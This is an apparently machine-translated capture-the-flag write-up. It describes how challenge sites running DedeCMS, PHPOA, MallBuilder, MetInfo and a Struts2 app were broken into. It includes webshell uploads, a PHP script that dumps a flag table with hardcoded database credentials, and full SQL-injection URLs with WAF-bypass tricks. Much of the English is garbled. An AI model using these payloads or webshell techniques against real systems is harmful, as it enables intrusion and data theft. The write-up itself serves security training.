bystudent
Title Name |
Topic Score |
Address |
MallBuilder2 |
350 |
mall.anquanbao.com.cn |
MallBuilder1 |
200 |
mall.anquanbao.com.cn |
DedeCMS2 |
300 |
cms.anquanbao.com.cn |
DedeCMS1 |
200 |
cms.anquanbao.com.cn |
MetInfo2 |
300 |
info.anquanbao.com.cn |
MetInfo1 |
200 |
info.anquanbao.com.cn |
PHPOA2 |
200 |
oa.anquanbao.com.cn |
PHPOA1 |
150 |
oa.anquanbao.com.cn |
BugScan1 |
500 |
scan.anquanbao.com.cn |
0x01 Dedecms
First saw the weaving dream, direct admin 123456 Log in, found that the left is blank.
Access File Manager directly from a file.
/dede/file_manage_main.php?activepath=/uploads
Found the first flag in the root directory, and then found that others are instantly 750 points, and then looked at the next flag.txt, get three flag.
Upload and the like are not, directly write a pht seconds. But the server special card, is also drunk, a word not even on, on a big horse, and then find the database configuration file, found after found unreadable. Is stuck when found flag.txt was deleted, background password has been changed, so ah, changed the backstage, deleted a lot of important documents.
Finally found that the file is 777, and then changed the config to. txt, and then read the configuration file.
But the WAF is strong.
Can log into the database, you can see the table Dede_flag, but is unable to read the data, simply write a php file read it.
0x02 Phpoa
This cloud has cases, with scripts, arbitrary file upload. Directly to a big horse, this database can be read directly, read and then write a PHP file read the database flag.
Case Portal:
http://www.wooyun.org/bugs/wooyun-2010-163275
But now (when writing writeup) The above method is no longer available, a lot of things are filtered, but you can pass a sentence, and then post so read.
Then write the file to read flag.
getflag.php
<?php
$con = mysql_connect ("localhost", "root", "2C2984BG");
$db _selected = mysql_selecst_db ("flag", $con);
$sql = "SELECT * from flag";
$result = mysql_query ($sql, $con);
while ($row = Mysql_fetch_array ($result)) {
Var_dump ($row);
}
Mysql_free_result ($result);
Mysql_close ($con);
?>
0x03 Mallbuilder
Flag.txt this time can not access, access to 405, casually add a post to bypass.
The cloud was searched, and the Mallbuilder parameter brand injection vulnerability was found.
http://www.wooyun.org/bugs/wooyun-2010-0176842
But can only read the file, how also around the WAF, security Bao is very tough ah, everything is 405.
Then an article was searched, using decimals to bypass the space.
http://wooyun.org/bugs/wooyun-2010-0157857
Http://mall.anquanbao.com.cn/?orderby=1&s=list&m=product&brand=x ' and 1=2.11111order by 44%23
Ultimate payload
Http://mall.anquanbao.com.cn/?orderby=1&s=list&m=product&brand=x ' and 1=2.2union%0aselect%0a 1,2,3,4,5, (select name Fromflag), 7,8,9,10,user (), 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44%23
0x04 Metinfo
Metinfo 5.2.4, this is a dark cloud case: Metinfo Latest Version (5.2.4) a SQL blind vulnerability
http://www.wooyun.org/bugs/wooyun-2014-055338
The simplest way to do this is to change the table name to flag and then download an Excel table that opens flag because flag is set to the table name ... Orz
http://info.anquanbao.com.cn//admin/content/feedback/export.php?met_parameter_1=flag--;&class1=1& Settings_arr[0][columnid]=1&settings_arr[0][name]=met_parameter
0x05 Bugscan
This is the first random try, tomcat/7.0.68. Found this:
Http://scan.anquanbao.com.cn/memoedit.action
Speculation is Struts2, with tools tested, there is a s2-032, but the WAF intercept command execution.
Tried a lot of ways to bypass the way around, no matter what all interception, is also a wonderful Ah, finally helpless, or with the most traditional method: The long URL around the past, 100w+. Flag is under the root directory.
© This article is for the original author of "Security Think tank", reproduced please specify copyright.
"Security think tank": 48H quickly win the Flag War Customs clearance writeup (Customs policy)